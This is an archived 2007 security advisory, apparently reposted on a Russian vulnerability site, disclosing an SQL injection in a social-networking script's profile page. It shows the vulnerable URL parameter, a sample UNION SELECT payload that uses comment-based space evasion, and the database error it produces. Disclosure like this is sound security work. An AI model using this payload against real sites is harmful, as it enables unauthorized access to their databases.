Уведомление о безопасности: [Aria-Security Team] social-networkin SQL Injection - ошибки и эксплоиты

[RU] switch to
English Version

Дополнительная информация
  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
  NuclearBB Alpha 2 Remote File Inclusion
  Husrev Forums v2.0.1:PoWerBoard Sql
  Proxy Anket v3.0.1 Sql injection Vulnerable
  phpMyQuote 0.20 Version Multiple Sql And Xss Vulnerabilities

From: Advisory_(at)_Aria-Security.net <Advisory_(at)_Aria-Security.net>
Date: 11 сентября 2007 г.
Subject: [Aria-Security Team] social-networkin SQL Injection

_________________________

A R I A - S E C U R I T Y
_________________________

http://www.social-networking.tv/
Demo: http://www.social-networking.tv/musicians/
http://mytarget/profile/myprofile.php?u=[SQL]

We will just provide an example to show the result when an SQL command is given

http://mytarget/profile/myprofile.php?u=[SQL]-
1/**/union/**/all/**/select/**/1/**/from/**/test

Result:
Table 'socialee_new.test' doesn't exist

-------------------------

Credits: Aria-Security Team
http://aria-security.net

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

test server